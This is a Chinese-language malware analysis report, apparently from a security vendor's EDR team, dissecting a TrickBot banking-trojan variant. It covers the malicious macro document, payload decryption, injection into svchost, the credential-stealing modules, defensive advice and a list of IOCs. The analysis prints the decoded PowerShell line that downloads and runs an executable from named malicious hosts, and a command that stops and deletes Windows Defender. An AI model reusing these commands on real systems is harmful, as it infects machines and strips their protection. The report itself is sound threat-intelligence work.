导语:最近国外安全研究人员发现TrickBot银行木马最新的样本,深信服EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细分析,确认此样本为TrickBot银行盗号木马的最新变种样本,并且此样本非常活跃,最近一段时间更新
一、背景
最近国外安全研究人员发现TrickBot银行木马最新的样本,深信服EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细分析,确认此样本为TrickBot银行盗号木马的最新变种样本,并且此样本非常活跃,最近一段时间更新非常频繁。
TrickBot银行木马是一款专门针对各国银行进行攻击的恶意样本,它之前被黑客团伙用于攻击全球多个国家的金融机构,主要是通过垃圾邮件的方式进行攻击,此次发现的样本会对全球数百家大型银行网站进行攻击,部分银行列表如下:
二、样本运行流程
三、样本分析
邮件附件DOC样本(重命名为Trickbot.doc),如下所示:
打开文档之后,如下所示:
分析DOC文件档,发现里面包含VBA宏代码,如下所示:
通过VBA宏编辑器解析DOC文档中的宏代码,如下所示:
动态调试解密里面的宏代码,通过CMD /C执行如下PowerShell脚本:
powershell "function [随机名]([string] $[随机名]){(new-object system.net.webclient).downloadfile($[随机名],'%temp%\[随机名].exe'); start-process '%temp%\[随机名].exe';} try{[随机名]('http://whitakerfamily.info/ico.ico')}catch{[随机名]('http://rayanat.com/ico.ico')}
通过powershell脚本下载相应的TrickBot恶意程序,并执行。
TrickBot母体程序(随机名重命名为TrickBot.exe),如下所示:
1.读取样本相应的资源数据到内存中,如下所示:
资源的ID:BBVCXZIIUHGSWQ,资源数据如下所示:
2.创建窗口,发送消息,如下所示:
3.对获取到的资源数据进行加解密相关操作,如下所示:
从程序中导入密钥1,如下所示:
从程序中导入密钥2,如下所示:
最后通过CryptEncrypt对数据进行操作,如下所示:
执行之后,在内存中将资源数据还原为一个Payload的数据,如下所示:
4.然后在内存加载还原出来的payload数据,如下所示:
5.还原出来的payload其实是一个DLL,内存加载DLL,如下所示:
定位到DLL的入口点:10001900处,如下所示:
6.判断DLL的入口函数是否为shellcode_main,如下所示:
Payload分析
1.获取相应的函数地址,如下所示:
2.通过检查程序的运行路径,启动父进程文件,如下所示:
3.然后向启动的父进程中,注入相应的代码如下所示:
4.检测操作系统版本,后面会根据操作系统版本下载相应的恶意文件,如下所示:
5.将程序中包含的PE代码,注入到父进程中,提取出来的PE代码,如下所示:
6.关闭Windows Defender软件,使用如下命令:
cmd.exe sc stop WinDefend cmd.exe sc delete WinDefend
删除Windows Defender服务之后,如下所示:
7.创建windows任务计划,实现自启动功能,如下所示:
启动相应的母体样本程序,如下所示:
8.拷贝自身到%appdata%\msscsc目录下TsickCot.exe程序,然后启动自身,并拉起SVCHOST.EXE进程,将恶意代码注入到多个SVCHOST.EXE进程中,然后执行,如下所示:
从网上下载多个恶意文件,如下所示:
启动五个相应的SVCHOST.EXE进程,如下所示:
下载了五个相应的模块,Modules目录下的文件,如下所示:
如果机器为64位的机器,则下载64位的相应的模块,如下所示:
相应的配置文件信息如下:
不同的SVCHOST进程,执行不同的功能,通过不同的配置文件。
(1)systeminfo32盗号用户主机系统,服务,安装程序等相关信息
1.获取相应的函数地址信息,如下所示:
2.获取计算机信息,收集用户系统版本、CPU信息、内存大小信息、软件安装信息、系统服务信息,如下所示:
3.查询主机系统版本,如下所示:
4.通过遍历注册表获取当前系统的安装程序信息,如下所示:
5.查询主机相关信息,如下所示:
6.查询主机进程相关信息,如下所示:
(2)injectDll32盗取用户网银帐号
1.检测相应的浏览器进程,如下所示:
2.获取浏览器进程通信数据,如下所示:
3.对浏览器进程,注入相关的代码,如下所示:
4.根据配置文件相关信息,进行过滤,然后对浏览器进程进行HOOK,如下所示:
HOOK之后的进程列表如下所示:
5.解密出来的配置文件信息,如下所示:
dpost配置文件(由于文件太大,截取部分)
sinj配置文件(由于文件太大,截取部分)
dinj配置文件(由于文件太大,截取部分)
上面只是截取了配置文件部分银行列表,从配置文件上可以看出,涉及到全球几百家银行机构网站……
此样本的流量分析,从网上下载相应的TrickBot木马,如下所示:
上传到恶意服务器的数据包,都是经过加密处理的,加密算法未知,如下所示:
此银行木马最近非常活跃,版本也不断更新当中,主要针对全球银行金融机构进行攻击,样本涉及到的模块较多,功能比较复杂。
同时深信服EDR安全团队发现最近ZeusPandaBanker、Gozi、Pegasus、Ratopak、Ursnif等银行木马的变种家族都非常活跃,更新频繁,这些家族主要针对全球各大银行进行攻击。
四、解决方案
深信服EDR已经能有效检测御防此类银行木马家族及其变种。
深信服EDR安全团队提醒广大用户:
1.不要点击来源不明的邮件附件,不从不明网站下载软件
2.及时给主机打补丁,修复相应的高危漏洞
3.对重要的数据文件定期进行非本地备份
4.尽量关闭不必要的文件共享权限以及关闭不必要的端口,如:445,135,139,3389等
5.RDP远程服务器等连接尽量使用强密码,不要使用弱密码
6.安装专业的终端安全防护软件,为主机提供端点防护和病毒检测清理功能
五、相关IOC
MD5
A8CD87036ECDDFBA234E3796D93FE667 ico.ico
5DFEA92F65755CF314180DB40596B9FE injectDll32
A652BAD6746C739CC8E69B077E6ED396 injectDll64
B3A9D059584418A2A0803FB0C6753EA9 systeminfo32
5D4512296AA66BFC0F2AE610556D84F2 systeminfo64
30562B6FE4D8EFDCE3783CDD0909FFE6 networkDll32
F877C696C4082654FE64E135966FFCC6 mailsearcher32
3C0A14D3E4E5F1968434ECB017A4689B importDll32
IP&URL:
94.103.81.144:447
82.202.221.78:443
90.69.224.122:443
82.202.221.163:447
185.13.39.197:443
94.103.81.144:447
109.234.39.42:447
188.124.167.132:8082
193.151.99.8:8082
162.249.229.101:8082
200.46.129.90:8082
70.79.178.120:8082
195.54.163.184:443
whitakerfamily.info 77.72.1.66
rayanat.com 104.244.127.60
http://37.230.116.249/response.php
此银行木马变种相关MD5样本
00c783ed3ec30f1b13db8e4f0008d1d9
522f44d30d15f8d03ecbee8ffe512f29
2ad35fa357a1a13658d6107934be41cc
6124c863c08f92732da180d4cf7cbf38
d98badb54f293a925359e74dad2e05cd
24acb11ecc19c40410ad5f2572cb70d3
da50d3f3dcf8ab927b77ed72cf5682d9
2bcac6bd4ea7790a9f037a4038b9d6c4
f3cde217a20a854aafa1a991da04c138
9979eb8a5e2c4fd32938497e6d4f896b
8fc45b16bec114a0dbb2035be651952b
3d1958a4ce83ca967dc4318ef2fba83b
380dc556f2c6fa232c0a7a5140f91201
54bc795028a9a3f1467d8ba8a3f1f5a2
faad8b0e030701d6f54f32b552e12382
ea7d592a67a86b28f6ed0093ed5d0530
6d9cbb2a2213164613b5d1abb8b5e192
beac135dace12faa4d2a91a9d4a014fb
b7c16e0d9986e662d1becc2d295b6e01
4269f6d322adf8ca9cb5eb7621859d50
06b202b24e2490af0560cf6e90a3ece1
08f7bd9ef4eb5a7f41ece67bc5a71116
4686479cb1d5fad4672980d0f72c21ef
a469be02ff61bc09f6b6ddf0288912c7
c1a8adaebaecd0cccc10aef6c9c16bf2
d7a0d269eb3f024986e18b071b18b3f0
94da8818d83bccd75aeb2314ec5337d8
f7809b17ed9a8ec4082259079e4f617e
922f26076daf81c300e303f032541a47
df89c3bde71dbe11fdcd115db2d38ddc
f5192a4960fd5ef69032e78f4e8b38c9
a1c2e8e735590b030279af638c4da791
a5d2080603a74b92744cb08186be7324
2d9183ce82f6d4eff494fcc42a75b878
3a8812ce7d48b6ec713de3a5a0efe646
989a54e314933e620bb69a1e768405f4
38f8d8dce460c79e47ccf8d0559d5ecf
cbb0ce54b5eec9de6ed74a9d5f0ac537
9ab498fc22237101236fb0048709795b
de1ce3514f777178d672ee79ac398a74
c8289bd00c65aa98ee73507fd18b5b95
92c73d8750f7de2e535360fce16e6565
028e30f7b50fd2ab2cd9df91cd3fd66d
483c84066f957662d3f3e490898ad996
8cd3ba008c93327369b3d50341db8f74
3d017b71fa8ba996f251d121521cd0f7
f0370f160bfa8338f386a0bdf4d1b481
5919aabbf2a93c1f1c2f492a8dac755e
f9f9f5e74c4d24a5517a05bd5c2025eb
cfe7bdedf0b91c6bba2d720f75b73667
edccfe5ef48de6b0f3bbf53cc1012533
5e72f8a9dad93cf1dbe6e2d4d3cf3dee
fbab92e484dbf4e22e8b32e8a0a14f3a
f9c51b9ddc15e9625aec2fba4deb4d7a
a6b15ca41e52fcb7bf3dc5941af950fe
7980226010f02292d8cbac440c9c0443
44de98af8b6588ea597cdc95844fdda6
8e957840019b780a52f87c4176afcf43
96985dff8be2912fe2d02752b5d4a073
a6dce7423960304106b6ad8d7f7d9fad
c2d2cff7e78292637f831aa97d2ffb0f
837117ca7de80b18182d1ecc38a83faa
fad828733cde4018d2f7dcdc6e2e4bae
eaf0e8ad1f63831108cae73b20b7b0c8
f0bd265c4732a39c800c7f36c4f6d5cc
dae500bf3c3d02a2e7a4baa07ef349f7
40d8ce3c2b8f49798a882b6c34f6c315
c1e3c3dd57654f19676e446474bbdd92
609f7242b99358225b30c587f1186554
a662cfe0c40942412fcc8e71912305fc
227c63dbba61806ba3833f1f30516f22
d2d7a0384f6a5e4e7a2eb59a5f4488da
6b7cd6c2712542857f131349c772c9dd
dd8039995c5c218eae97b0bd1f2e65b0
35464492a9b2e63ac10e12d3babc89a7
c479099e2934e284e4bcd3c5b75beab0
284eca5253a65e73b5c0d805b5b5cd0d
7e300630af2923f0ca5c79811993e982
7a0f9608b48ba4838c24b864fd76ade5
88cd706ce6cbadc7e1722b1fcea7de41
0bd3aa3b71b481e47ca40b4497b7a8c3
73582cd6bd542a34fa36a6a8c768307c
0dc94f956e517ea69f4a3cd623bebb59
90eeed0624377283c4051f75e3752494
79d737143963888a824c35d09d6b0926
5f3969937055daddfb338dbcda32c518
80205bfb1c9ad950012378b69413630d
d1e66c20f3d6e756bd7f3cde6d560a4d
9b4bceda48cbd1ea5a848797e909dcbf
fabfc503eb52ce5d44363bfa139aed69
77bfe45f5991d36830c1ecd2d5311e6b
8c1933fe2278e15299158ec894abfc78
65c0910b047c11038ea5b723b43a6647
781a966bd0cf5fc4059d5670a5c8dfb5
72284c43ec4d9ff61c78970fef9b6c4b
6f2b25443630928d3408f35174898979
a2266baca1e5c71209f6c957af18e3f4
7302c18f5015740f7dbab389fbb71196
c4634916686ad740e1d17f23721152e2
c8faa8cb0e2412421c7263936f6734ea
6024143edd8331063a2b1af6fffbe0c0
c52cba3359ef8b900b25dd81ec5df47d
60be89cfcec7b0f485bba11b53df8d4c
7c728c2d9b9e1f5518aa6013db02cc0b
3d55d71c3f0655837694ea125687e479
3865ad4479d2e21b84e751044bf94c76
74227f2c7fc61aac5209a70d0e2d68f0
4598fe6c73be9f241006dfb35a76704a
9a163fa52d9cdd9f9c5e7b1549233b4d
3d3e08ad3a8f3b35b9a10aa6c57b290f
e35e2ac95a98d7a0651f4991837c36de
3ae26d6afc281d10592543c9bbd7560d
8fed59d5bc87c3b5794bca3e519ff2f4